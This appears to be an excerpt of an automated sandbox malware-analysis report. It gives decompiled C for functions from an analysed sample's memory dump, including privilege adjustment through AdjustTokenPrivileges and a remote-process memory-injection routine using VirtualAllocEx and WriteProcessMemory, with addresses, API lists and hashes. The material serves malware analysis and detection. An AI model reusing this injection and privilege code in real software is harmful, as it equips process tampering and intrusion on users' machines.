C-Code - Quality: 93%

			E006F2F10(void* __ecx) {
				char _v1036;
				struct _TOKEN_PRIVILEGES _v1052;
				struct _LUID _v1064;
				char _v1068;
				void* _v1072;
				void* _t10;
				intOrPtr _t12;
				void* _t14;
				struct _TOKEN_PRIVILEGES* _t23;
				char* _t25;
				HANDLE* _t27;
				WCHAR* _t28;
				void* _t29;
				long _t35;
				DWORD* _t36;

				_t29 = __ecx;
				_t36 =  &_v1064;
				_t1 = _t29 + 0x10; // 0x2fa2a8
				_t10 = E006EC430( *_t1);
				_t35 = 0;
				if(_t10 == 0) {
					L9:
					return _t35;
				}
				_t12 =  *0x6f9ae8; // 0x1
				if(_t12 == 0) {
					goto L9;
				}
				if( *0x6f9c28 != 0) {
					L7:
					_t25 =  &_v1036;
					E006F4520(_t25, 0x9a);
					_push(_t25);
					_t14 = E006EC440();
					if(_t14 != 0) {
						_push(_t14);
						_t35 = E006ED350();
						E006E91E0(_t14);
					}
					goto L9;
				}
				_t27 =  &_v1072;
				 *_t27 = 0;
				 *_t36 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0x28, _t27) != 0) {
					_t28 =  &_v1036;
					E006F4520(_t28, 0x5f);
					_t36 =  &(_t36[2]);
					if(LookupPrivilegeValueW(0, _t28,  &_v1064) != 0) {
						_t23 =  &_v1068;
						_t23->PrivilegeCount = 1;
						_t23->Privileges[0].Luid = 2;
						AdjustTokenPrivileges(_v1072, 0, _t23, 0x10,  &_v1052, _t36);
					}
				}
				 *0x6f9c28 =  *0x6f9c28 + 1;
				goto L7;
			}

0x006f2f10
0x006f2f13
0x006f2f1b
0x006f2f1e
0x006f2f23
0x006f2f27
0x006f2fe5
0x006f2ff0
0x006f2ff0
0x006f2f2d
0x006f2f34
0x00000000
0x00000000
0x006f2f41
0x006f2fb1
0x006f2fb1
0x006f2fbb
0x006f2fc3
0x006f2fc4
0x006f2fce
0x006f2fd4
0x006f2fda
0x006f2fdd
0x006f2fe2
0x00000000
0x006f2fce
0x006f2f45
0x006f2f49
0x006f2f4b
0x006f2f60
0x006f2f62
0x006f2f69
0x006f2f6e
0x006f2f81
0x006f2f83
0x006f2f8d
0x006f2f93
0x006f2fa5
0x006f2fa5
0x006f2f81
0x006f2fab
0x00000000

APIs

GetCurrentProcess.KERNEL32 ref: 006F2F4E
OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 006F2F58
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006F2F79
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?), ref: 006F2FA5

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 2349140579-0
Opcode ID: 87ed292992afac0a8525cce33da95c2c4f761a2cd42e91fafd3e9315e039ebc9
Instruction ID: 42814870239b18dedbaf273fef0ea0d7820b1a132525a31f06786b5c09308e97
Opcode Fuzzy Hash: 87ed292992afac0a8525cce33da95c2c4f761a2cd42e91fafd3e9315e039ebc9
Instruction Fuzzy Hash: BA21A1B16413056BE750AB21EC95FBB77EAAF88755F041828BA05C6292EA70D908CB71

Uniqueness

Uniqueness Score: -1.00%

Function 006E9CD0, Relevance: 4.5, APIs: 3, Instructions: 44
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006E9CD0(void* __eax, void* _a4, void* _a8, long _a12) {
				void* _t5;
				void* _t10;
				SIZE_T* _t11;
				void* _t12;
				void* _t13;
				long _t14;
				SIZE_T* _t15;

				_t14 = _a12;
				_t10 = _a4;
				_t5 = VirtualAllocEx(_t10, 0, _t14, 0x3000, 0x40);
				_t13 = 0;
				if(_t5 != 0) {
					_t12 = _t5;
					_t11 = _t15;
					 *_t11 = 0;
					if(WriteProcessMemory(_t10, _t12, _a8, _t14, _t11) == 0 ||  *_t15 != _t14) {
						VirtualFreeEx(_t10, _t12, 0, 0x8000);
					} else {
						_t13 = _t12;
					}
				}
				return _t13;
			}

0x006e9cd5
0x006e9cd9
0x006e9ce8
0x006e9cee
0x006e9cf2
0x006e9cf4
0x006e9cfa
0x006e9cfc
0x006e9d0f
0x006e9d23
0x006e9d16
0x006e9d16
0x006e9d16
0x006e9d0f
0x006e9d32

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,00000000,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9CE8
WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D07
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000,?,?,00000000,?,?,006EDA93,?,?,00000080), ref: 006E9D23

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Virtual$AllocFreeMemoryProcessWrite
String ID:
API String ID: 3247110995-0
Opcode ID: 8c0a119fb398ac421670c68d8e2cc6ec4b28438e6eda175a5bf0e0737895a0c0
Instruction ID: 02ba26b2deaf33ab2b4448798ff80cad5a521ca00bc4c24ff8658c069efa2b28
Opcode Fuzzy Hash: 8c0a119fb398ac421670c68d8e2cc6ec4b28438e6eda175a5bf0e0737895a0c0
Instruction Fuzzy Hash: D6F0B4B1341754BBE3204F27DC45F677AADEF8AB94F210418FA45D7280D570E801C671

Uniqueness

Uniqueness Score: -1.00%

Function 006F5EB0, Relevance: 4.3, APIs: 3, Instructions: 524
stringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E006F5EB0(void* __ecx, void* __eflags) {
				signed char* _t133;
				intOrPtr _t134;
				signed int _t135;
				void* _t140;
				signed char _t144;
				signed char* _t146;
				signed char _t158;
				signed int _t161;
				intOrPtr _t163;
				signed int _t164;
				signed int _t165;
				signed int _t172;
				intOrPtr _t173;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t179;
				intOrPtr _t184;
				signed char* _t185;
				signed int _t186;
				void* _t187;
				signed int _t188;
				signed int _t190;
				signed int _t192;
				signed int _t193;
				signed int _t195;
				intOrPtr _t196;
				signed int _t197;
				signed char* _t198;
				signed int _t199;
				intOrPtr _t200;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int* _t214;
				intOrPtr _t215;
				signed char* _t218;
				signed int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				WCHAR* _t229;
				signed int _t230;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				intOrPtr _t244;
				signed char* _t249;
				intOrPtr* _t250;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr _t254;
				intOrPtr _t255;
				signed int* _t258;
				signed int _t262;
				signed int* _t264;
				intOrPtr _t266;
				intOrPtr _t269;
				signed int _t270;
				signed int _t271;
				intOrPtr _t272;
				signed int _t273;
				signed char _t274;
				intOrPtr _t276;
				intOrPtr* _t277;
				signed int _t280;
				signed int _t284;
				signed int* _t285;
				void* _t286;
				signed int* _t290;
				signed int _t291;
				void* _t292;
				signed char _t293;
				signed int _t294;
				void* _t295;
				WCHAR* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed char* _t303;
				void* _t306;
				void* _t307;
				signed int* _t308;
				signed int* _t309;
				signed int* _t310;
				signed int* _t312;
				signed int* _t313;

				_t286 = __ecx;
				_t235 = 0;
				_t302 = _t306 + 0x14;
				E006F6610(_t306 + 0x14, 0, 0x63c);
				_t307 = _t306 + 0xc;
				_t133 =  *0x6f9c08; // 0x308280
				_t133[0x490] = 0;
				_t244 =  *0x6f9b0c; // 0x2ef350
				 *(_t244 + 8) = 1;
				_t4 = _t244 + 0x24; // 0x0
				_t134 =  *_t4;
				if(_t134 == 0) {
					 *(_t244 + 8) = 2;
					_t135 = E006E5B70(0x83);
					_t308 = _t307 + 4;
					_t308[0xe] = _t135;
					L39:
					_t292 =  &(_t308[0x74]);
					_t303 =  *0x6f9c08; // 0x308280
					_t62 =  &(_t303[0x10]); // 0x308290
					_t303[8] =  *(_t292 - 0x188);
					_t303[0x494] =  *(_t292 - 0x198);
					_t303[0xc] =  *(_t292 - 0x19c);
					_t140 = memcpy(_t62, _t292, 0x20 << 2);
					_t309 =  &(_t308[3]);
					E006EC400(_t140,  &(_t309[0x94]), 0x400);
					_t310 =  &(_t309[3]);
					_t142 =  *_t303;
					if( *_t303 != 0) {
						E006E91E0(_t142);
						_t310 =  &(_t310[1]);
						_t303 =  *0x6f9c08; // 0x308280
					}
					_t71 =  &(_t303[4]); // 0x0
					_t143 =  *_t71;
					if( *_t71 != 0) {
						E006E91E0(_t143);
						_t310 =  &(_t310[1]);
					}
					_t248 = _t310[7];
					_t293 = 0;
					_t144 = 0;
					if(_t310[7] != 0) {
						_t144 = E006EB7A0(_t248);
						_t310 =  &(_t310[1]);
					}
					_t249 =  *0x6f9c08; // 0x308280
					 *_t249 = _t144;
					_t145 = _t310[8];
					if(_t310[8] != 0) {
						_t158 = E006EB7A0(_t145);
						_t310 =  &(_t310[1]);
						_t293 = _t158;
					}
					_t146 =  *0x6f9c08; // 0x308280
					_t146[4] = _t293;
					if(_t310[5] == 0) {
						L50:
						_t147 = _t310[0x10];
						if(_t310[0x10] != 0) {
							E006E91E0(_t147);
							_t310 =  &(_t310[1]);
						}
						_t148 = _t310[0xf];
						if(_t310[0xf] != 0) {
							E006E91E0(_t148);
							_t310 =  &(_t310[1]);
						}
						_t149 = _t310[6];
						if(_t310[6] != 0) {
							E006E91E0(_t149);
							_t310 =  &(_t310[1]);
						}
						_t150 = _t310[0xb];
						if(_t310[0xb] != 0) {
							E006E91E0(_t150);
						}
						return _t235;
					} else {
						_t294 = 0;
						do {
							E006E91E0( *((intOrPtr*)(_t310[6] + _t294 * 4)));
							_t310 =  &(_t310[1]);
							_t294 = _t294 + 1;
						} while (_t294 < _t310[5]);
						goto L50;
					}
				}
				_t250 = _t307 + 0x650;
				_t295 = _t307 + 0x18;
				 *_t250 = 0x20;
				_push(0xffffffff);
				_push(_t295);
				_push(_t250);
				_push(_t134);
				_t161 = E006E9FF0();
				_t312 = _t307 + 0x10;
				 *(_t295 - 4) = _t161;
				if((_t161 & 0xfffffffe) != 2) {
					_t163 =  *0x6f9b0c; // 0x2ef350
					 *(_t163 + 8) = 2;
					_push(0x84);
					L7:
					_t164 = E006E5B70();
					_t308 =  &(_t312[1]);
					_t308[0xe] = _t164;
					L8:
					_t235 = 0;
					goto L39;
				}
				_t165 = _t312[6];
				_t296 =  &(_t312[0x1c6]);
				_t312[7] =  *_t165;
				_t312[8] =  *(_t165 + 4);
				E006F4520(_t296, 0x80);
				_t313 =  &(_t312[2]);
				if(lstrcmpiW(_t313[9], _t296) == 0) {
					_t297 = 0;
					_t236 = 0;
					_t313[1] = 1;
				} else {
					E006F4520(_t296, 0x81);
					_t313 =  &(_t313[2]);
					if(lstrcmpiW(_t313[9], _t296) == 0) {
						_t236 = 0;
						_t297 = 1;
						__eflags = 1;
					} else {
						E006F4520(_t296, 0x82);
						_t313 =  &(_t313[2]);
						_t236 = 0 | lstrcmpiW(_t313[9], _t296) == 0x00000000;
						_t297 = 0;
					}
					_t313[1] = 0;
				}
				if(_t313[5] != 3) {
					L22:
					_t172 = E006F2E70( *((intOrPtr*)( &(_t313[0x10]) - 0x20)), 0,  &(_t313[0x10]), 0xffffffff);
					_t312 =  &(_t313[4]);
					__eflags = _t172;
					if(_t172 == 0) {
						_t173 =  *0x6f9b0c; // 0x2ef350
						 *(_t173 + 8) = 2;
						_push(0x86);
						goto L7;
					}
					_t252 =  *0x6f9a94; // 0x2fd120
					_t312[3] = _t297;
					 *_t312 = _t236;
					_t174 = E006E49B0(_t252, _t312[7]);
					__eflags = _t312[1];
					_t298 = _t174;
					if(_t312[1] == 0) {
						_t237 = 0;
						_t253 = 0;
						L35:
						__eflags = _t298;
						if(_t298 != 0) {
							L61:
							_t238 = _t253;
							_t176 = E006F2E70( *((intOrPtr*)(_t298 + 8)), 0,  &(_t312[0xf]), 0xffffffff);
							_t308 =  &(_t312[4]);
							__eflags = _t176;
							if(__eflags == 0) {
								goto L19;
							}
							_t255 =  *0x6f9a94; // 0x2fd120
							_t179 = E006F20F0(_t255, __eflags, _t298,  &(_t308[0x13]));
							__eflags = _t179;
							if(_t179 == 0) {
								_push(0x87);
								goto L20;
							}
							__eflags = _t308[1];
							if(_t308[1] == 0) {
								__eflags = _t308[3] |  *_t308;
								if((_t308[3] |  *_t308) == 0) {
									__eflags =  *(_t298 + 0x18);
									if( *(_t298 + 0x18) == 0) {
										_push(_t286);
										E006E38E0(_t298, _t302);
										_t308 =  &(_t308[3]);
									} else {
										E006ED950( *((intOrPtr*)(_t298 + 0x48)), _t298, _t302, _t286);
									}
									L99:
									_t235 = 1;
									goto L39;
								}
								_t184 =  *0x6f9b0c; // 0x2ef350
								_t235 = 1;
								 *((intOrPtr*)(_t184 + 8)) = 1;
								_t185 =  *0x6f9c08; // 0x308280
								_t185[0x490] = 1;
								__eflags =  *(_t298 + 0x18);
								if( *(_t298 + 0x18) == 0) {
									_t186 = E006F3420(_t298);
									__eflags = _t186;
									if(_t186 == 0) {
										_t187 = 0x89;
										L107:
										_t188 = E006E5B70(_t187);
										_t308 =  &(_t308[1]);
										_t308[0xe] = _t188;
										L108:
										_t258 =  *0x6f9a94; // 0x2fd120
										_push( *_t308);
										L109:
										_push(1);
										_push(_t298);
										E006ED6B0(_t258);
										goto L39;
									}
									_t190 = E006E1F50(_t186, _t298);
									__eflags = _t190;
									if(_t190 != 0) {
										goto L108;
									}
									_t187 = 0x8d;
									goto L107;
								}
								E006F0090(_t185,  *((intOrPtr*)(_t298 + 0x48)), _t298,  *_t308);
								goto L39;
							}
							_t192 = E006F3420(_t298);
							_t262 = _t298;
							__eflags = _t192;
							if(_t192 == 0) {
								_push(0);
								_t290 =  &(_t308[0x195]);
								L80:
								_push(_t290);
								_t193 = E006F1F80(_t262);
								__eflags = _t193;
								if(_t193 != 0) {
									L87:
									_t235 = 0;
									_t195 = E006EC110(_t298,  *((intOrPtr*)( &(_t308[0x94]) - 0x214)),  *((intOrPtr*)( &(_t308[0x94]) - 0x224)),  *((intOrPtr*)( &(_t308[0x94]) - 0x220)),  &(_t308[0x94]),  &(_t308[0x16]), 0, 0, 0);
									__eflags = _t195;
									if(_t195 == 0) {
										_t196 =  *0x6f9b0c; // 0x2ef350
										 *((intOrPtr*)(_t196 + 8)) = 7;
										_t197 = E006E5B70(0x8b);
										_t308 =  &(_t308[1]);
										_t258 =  *0x6f9a94; // 0x2fd120
										_t308[0xe] = _t197;
										_push(0);
										goto L109;
									}
									_t198 =  *0x6f9c08; // 0x308280
									_t198[0x490] = 1;
									goto L99;
								}
								_t199 = E006EB7A0(_t290);
								_t308 =  &(_t308[1]);
								_t308[0xe] = _t199;
								_t200 =  *0x6f9b0c; // 0x2ef350
								 *((intOrPtr*)(_t200 + 8)) = 7;
								_t264 =  *0x6f9a94; // 0x2fd120
								_push(1);
								_push(1);
								L105:
								_push(_t298);
								E006ED6B0(_t264);
								goto L8;
							}
							_t204 = E006E1F50(_t192, _t262);
							__eflags = _t204;
							_t290 =  &(_t308[0x194]);
							if(_t204 == 0) {
								__eflags =  *(_t298 + 0x30);
								if(__eflags == 0) {
									E006F5C10(_t298, __eflags);
									_t262 = _t298;
									_push(0);
									goto L80;
								}
								_t206 = E006E5B70(0x8a);
								_t308 =  &(_t308[1]);
								_t266 =  *0x6f9b0c; // 0x2ef350
								_t308[0xe] = _t206;
								 *((intOrPtr*)(_t266 + 8)) = 1;
								_t264 =  *0x6f9a94; // 0x2fd120
								_push(0);
								_push(1);
								goto L105;
							}
							__eflags = _t238;
							if(__eflags == 0) {
								E006F5C10(_t298, __eflags);
								_t208 = E006F1F80(_t298, _t290, 0);
								__eflags = _t208;
								if(_t208 == 0) {
									_t209 = E006EB7A0(_t290);
									_t308 =  &(_t308[1]);
									_t269 =  *0x6f9b0c; // 0x2ef350
									_t308[0xe] = _t209;
									 *((intOrPtr*)(_t269 + 8)) = 7;
									_t264 =  *0x6f9a94; // 0x2fd120
									_push(0);
									_push(1);
									goto L105;
								}
								goto L87;
							}
							_t210 = E006E3180(0x400, 0);
							_t308 =  &(_t308[2]);
							_t308[0xe] = _t210;
							_t211 = _t210 + 0xfffffffe;
							__eflags = _t211;
							_t284 = 0xfffffe00;
							_t270 = _t308[7];
							while(1) {
								_t299 =  *(_t270 + 0x400 + _t284 * 2) & 0x0000ffff;
								__eflags = _t299;
								if(_t299 == 0) {
									break;
								}
								 *(_t211 + 2) = _t299;
								_t211 = _t211 + 2;
								_t284 = _t284 + 1;
								__eflags = _t284;
								if(_t284 != 0) {
									continue;
								}
								L103:
								 *_t214 = 0;
								L38:
								_t215 =  *0x6f9b0c; // 0x2ef350
								_t235 = 0;
								__eflags = 0;
								 *(_t215 + 8) = 1;
								goto L39;
							}
							 *(_t211 + 2) = 0;
							E006F4520( &(_t308[0x1c7]), 0x8c);
							_t308 =  &(_t308[2]);
							_t285 = _t308[0xe];
							_t271 = 0x200;
							while(1) {
								__eflags =  *_t285;
								if( *_t285 == 0) {
									break;
								}
								_t285 =  &(_t285[0]);
								_t271 = _t271 - 1;
								__eflags = _t271;
								if(_t271 != 0) {
									continue;
								}
								goto L38;
							}
							_t300 = 0;
							__eflags = 0;
							while(1) {
								_t291 =  *(_t308 + 0x718 + _t300 * 2) & 0x0000ffff;
								_t214 = _t285;
								__eflags = _t291;
								if(_t291 == 0) {
									goto L103;
								}
								_t300 = _t300 + 1;
								_t285 =  &(_t214[0]);
								 *_t214 = _t291;
								__eflags = _t271 - _t300;
								if(_t271 != _t300) {
									continue;
								}
								goto L103;
							}
							goto L103;
						}
						L36:
						__eflags =  *_t312 | _t312[3];
						if(( *_t312 | _t312[3]) == 0) {
							_t312[2] = _t253;
							_t272 =  *0x6f9a94; // 0x2fd120
							_t218 =  &(_t312[4]);
							 *_t218 = 0;
							_push(_t218);
							_t219 = E006F3AC0(_t272, _t280, _t312[9], _t237);
							__eflags = _t219;
							if(_t219 == 0) {
								__eflags = _t312[4] - 1;
								if(_t312[4] == 1) {
									_t220 =  *0x6f9b0c; // 0x2ef350
									 *((intOrPtr*)(_t220 + 8)) = 4;
								}
								_push(0x85);
								goto L7;
							}
							_t253 = _t312[2];
							_t298 = _t219;
							goto L61;
						}
						_t221 = E006E5B70(0x89);
						_t308 =  &(_t312[1]);
						_t308[0xe] = _t221;
						goto L38;
					}
					_t222 = _t312[8];
					_t237 = 0;
					_t273 =  *_t222;
					__eflags = _t273 - 0x740073;
					if(_t273 == 0x740073) {
						__eflags = _t222[1] - 0x720041;
						_t51 = _t222[1] == 0x720041;
						__eflags = _t51;
						_t274 = _t273 & 0xffffff00 | _t51;
					} else {
						__eflags = _t273 - 0x540073;
						_t274 = 0;
						if(_t273 == 0x540073) {
							__eflags = _t222[1] - 0x720061;
							_t237 = 0 | _t222[1] == 0x00720061;
							_t274 = _t237;
						}
					}
					_t253 = _t274 & 0x000000ff;
					__eflags = _t298;
					if(_t298 == 0) {
						goto L35;
					} else {
						__eflags = _t237 | _t253;
						if((_t237 | _t253) != 0) {
							goto L35;
						}
						_t312[2] = _t253;
						do {
							E006EDCC0(_t298,  *((intOrPtr*)(_t298 + 0x44)));
							_t276 =  *0x6f9a94; // 0x2fd120
							E006F6660(_t276, _t312[8], 1);
							_t277 =  *0x6f9a94; // 0x2fd120
							_t227 = E006E49B0(_t277, _t312[7]);
							_t298 = _t227;
							__eflags = _t227;
						} while (_t227 != 0);
						_t253 = _t312[2];
						goto L36;
					}
				} else {
					_t229 =  *(_t313[6] + 8);
					_t313[9] = _t229;
					if(_t229 == 0) {
						L18:
						_t313[0xa] = 0;
						L19:
						_push(0x86);
						L20:
						_t177 = E006E5B70();
						_t308 =  &(_t308[1]);
						_t254 =  *0x6f9b0c; // 0x2ef350
						_t308[0xe] = _t177;
						_t235 = 0;
						 *(_t254 + 8) = 2;
						goto L39;
					}
					_t280 = 0;
					while(_t229[_t280] != 0) {
						_t280 = _t280 + 1;
						if(_t280 != 0x7fffffff) {
							continue;
						}
						_t313[0xa] = 0;
						goto L18;
					}
					 *( &(_t313[0xc]) - 8) = _t280;
					_t302 =  &(_t313[7]);
					_t230 = E006F08A0(_t229, _t229, _t280,  &(_t313[0xc]),  &(_t313[0xc]));
					__eflags = _t230;
					if(_t230 == 0) {
						_push(0x88);
						goto L20;
					}
					goto L22;
				}
			}

0x006f5eba
0x006f5ebc
0x006f5ebe
0x006f5ec9
0x006f5ece
0x006f5ed1
0x006f5ed6
0x006f5edc
0x006f5ee2
0x006f5ee9
0x006f5ee9
0x006f5eee
0x006f5f9b
0x006f5fa7
0x006f5fac
0x006f5faf
0x006f617d
0x006f617d
0x006f6184
0x006f6195
0x006f6198
0x006f61a1
0x006f61ad
0x006f61b6
0x006f61b6
0x006f61c6
0x006f61cb
0x006f61ce
0x006f61d3
0x006f61d6
0x006f61db
0x006f61de
0x006f61de
0x006f61e4
0x006f61e4
0x006f61e9
0x006f61ec
0x006f61f1
0x006f61f1
0x006f61f4
0x006f61f8
0x006f61fa
0x006f6201
0x006f6204
0x006f6209
0x006f6209
0x006f620c
0x006f6212
0x006f6214
0x006f621a
0x006f621d
0x006f6222
0x006f6225
0x006f6225
0x006f6227
0x006f622c
0x006f6234
0x006f624e
0x006f624e
0x006f6254
0x006f6257
0x006f625c
0x006f625c
0x006f625f
0x006f6265
0x006f6268
0x006f626d
0x006f626d
0x006f6270
0x006f6276
0x006f6279
0x006f627e
0x006f627e
0x006f6281
0x006f6287
0x006f628a
0x006f628f
0x006f629e
0x006f6236
0x006f6236
0x006f6238
0x006f623f
0x006f6244
0x006f6247
0x006f6248
0x00000000
0x006f6238
0x006f6234
0x006f5ef4
0x006f5efb
0x006f5eff
0x006f5f05
0x006f5f07
0x006f5f08
0x006f5f09
0x006f5f0a
0x006f5f0f
0x006f5f12
0x006f5f1b
0x006f5fb8
0x006f5fbd
0x006f5fc4
0x006f5fc9
0x006f5fc9
0x006f5fce
0x006f5fd1
0x006f5fd5
0x006f5fd5
0x00000000
0x006f5fd5
0x006f5f21
0x006f5f25
0x006f5f2e
0x006f5f35
0x006f5f3f
0x006f5f44
0x006f5f54
0x006f5fde
0x006f5fe0
0x006f5fe3
0x006f5f5a
0x006f5f60
0x006f5f65
0x006f5f75
0x006f5fe9
0x006f5fed
0x006f5fed
0x006f5f77
0x006f5f7d
0x006f5f82
0x006f5f94
0x006f5f97
0x006f5f97
0x006f5fee
0x006f5fee
0x006f5ffb
0x006f6078
0x006f6084
0x006f6089
0x006f608c
0x006f608e
0x006f60dc
0x006f60e1
0x006f60e8
0x00000000
0x006f60e8
0x006f6090
0x006f6096
0x006f609a
0x006f60a1
0x006f60a6
0x006f60ab
0x006f60ad
0x006f60f2
0x006f60f4
0x006f6149
0x006f6149
0x006f614b
0x006f62cc
0x006f62cc
0x006f62da
0x006f62df
0x006f62e2
0x006f62e4
0x00000000
0x00000000
0x006f62ea
0x006f62f6
0x006f62fb
0x006f62fd
0x006f6384
0x00000000
0x006f6384
0x006f6303
0x006f6308
0x006f6392
0x006f6395
0x006f645e
0x006f6462
0x006f656b
0x006f656e
0x006f6573
0x006f6468
0x006f646e
0x006f646e
0x006f6576
0x006f6578
0x00000000
0x006f6578
0x006f639b
0x006f63a2
0x006f63a3
0x006f63a6
0x006f63ab
0x006f63b1
0x006f63b5
0x006f6500
0x006f6505
0x006f6507
0x006f65d3
0x006f65d8
0x006f65d9
0x006f65de
0x006f65e1
0x006f65e5
0x006f65e5
0x006f65eb
0x006f65ee
0x006f65ee
0x006f65f0
0x006f65f1
0x00000000
0x006f65f1
0x006f650f
0x006f6514
0x006f6516
0x00000000
0x00000000
0x006f651c
0x00000000
0x006f651c
0x006f63c2
0x00000000
0x006f63c2
0x006f6310
0x006f6315
0x006f6317
0x006f6319
0x006f63e9
0x006f63eb
0x006f63f2
0x006f63f2
0x006f63f3
0x006f63f8
0x006f63fa
0x006f6491
0x006f6491
0x006f64b7
0x006f64bc
0x006f64be
0x006f64d4
0x006f64d9
0x006f64e5
0x006f64ea
0x006f64ed
0x006f64f3
0x006f64f7
0x00000000
0x006f64f7
0x006f64c0
0x006f64c5
0x00000000
0x006f64c5
0x006f6401
0x006f6406
0x006f6409
0x006f640d
0x006f6412
0x006f641b
0x006f6422
0x006f6423
0x006f65c8
0x006f65c8
0x006f65c9
0x00000000
0x006f65c9
0x006f631f
0x006f6324
0x006f6326
0x006f632d
0x006f6429
0x006f642d
0x006f655d
0x006f6562
0x006f6564
0x00000000
0x006f6564
0x006f6438
0x006f643d
0x006f6440
0x006f6448
0x006f644d
0x006f6450
0x006f6456
0x006f6458
0x00000000
0x006f6458
0x006f6333
0x006f6335
0x006f647a
0x006f6484
0x006f6489
0x006f648b
0x006f65a5
0x006f65aa
0x006f65ad
0x006f65b3
0x006f65b7
0x006f65be
0x006f65c4
0x006f65c6
0x00000000
0x006f65c6
0x00000000
0x006f648b
0x006f6342
0x006f6347
0x006f634a
0x006f634e
0x006f634e
0x006f6351
0x006f6356
0x006f635a
0x006f635a
0x006f6362
0x006f6365
0x00000000
0x00000000
0x006f636b
0x006f636f
0x006f6372
0x006f6372
0x006f6373
0x00000000
0x00000000
0x006f659a
0x006f659a
0x006f616f
0x006f616f
0x006f6174
0x006f6174
0x006f6176
0x00000000
0x006f6176
0x006f6526
0x006f6539
0x006f653e
0x006f6541
0x006f6545
0x006f654a
0x006f654a
0x006f654e
0x00000000
0x00000000
0x006f6550
0x006f6553
0x006f6553
0x006f6554
0x00000000
0x00000000
0x00000000
0x006f6556
0x006f657e
0x006f657e
0x006f6580
0x006f6580
0x006f6588
0x006f658a
0x006f658d
0x00000000
0x00000000
0x006f658f
0x006f6590
0x006f6593
0x006f6596
0x006f6598
0x00000000
0x00000000
0x00000000
0x006f6598
0x00000000
0x006f6580
0x006f6151
0x006f6154
0x006f6158
0x006f629f
0x006f62a3
0x006f62a9
0x006f62ad
0x006f62b3
0x006f62b9
0x006f62be
0x006f62c0
0x006f63cc
0x006f63d1
0x006f63d3
0x006f63d8
0x006f63d8
0x006f63df
0x00000000
0x006f63df
0x006f62c6
0x006f62ca
0x00000000
0x006f62ca
0x006f6163
0x006f6168
0x006f616b
0x00000000
0x006f616b
0x006f60af
0x006f60b3
0x006f60b5
0x006f60b7
0x006f60bd
0x006f60f8
0x006f60ff
0x006f60ff
0x006f60ff
0x006f60bf
0x006f60bf
0x006f60c5
0x006f60ca
0x006f60ce
0x006f60d5
0x006f60d8
0x006f60d8
0x006f60ca
0x006f6102
0x006f6105
0x006f6107
0x00000000
0x006f6109
0x006f610b
0x006f610d
0x00000000
0x00000000
0x006f610f
0x006f6113
0x006f6118
0x006f611d
0x006f6129
0x006f612e
0x006f6138
0x006f613d
0x006f613f
0x006f613f
0x006f6143
0x00000000
0x006f6143
0x006f5ffd
0x006f6001
0x006f6006
0x006f600a
0x006f6026
0x006f6026
0x006f602e
0x006f602e
0x006f6033
0x006f6033
0x006f6038
0x006f603b
0x006f6041
0x006f6045
0x006f6047
0x00000000
0x006f6047
0x006f600c
0x006f600e
0x006f6015
0x006f601c
0x00000000
0x00000000
0x006f601e
0x00000000
0x006f601e
0x006f6059
0x006f6065
0x006f606b
0x006f6070
0x006f6072
0x006f637a
0x00000000
0x006f637a
0x00000000
0x006f6072

APIs

lstrcmpiW.KERNEL32(?,?), ref: 006F5F4C
lstrcmpiW.KERNEL32(?,?), ref: 006F5F6D
lstrcmpiW.KERNEL32(?,?), ref: 006F5F8A

Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C30
Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C45
Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C7B
Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C89
Part of subcall function 006F5C10: CloseHandle.KERNEL32(?), ref: 006F5C97

Part of subcall function 006EC110: lstrlen.KERNEL32(?), ref: 006EC154

Part of subcall function 006E1F50: GetExitCodeThread.KERNEL32(?,?,?,?,006E391B), ref: 006E1F6A

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CloseHandle$lstrcmpi$CodeExitThreadlstrlen
String ID:
API String ID: 1549611325-0
Opcode ID: 806676a9ac2160821656b73c3c3d18db0ff4a4b5fcef53e859bad7cfc76f4798
Instruction ID: 4770a8ff2bbfbcbfa8c60e7313eaca9ba391f8fac0ae812f7628ca101706f306
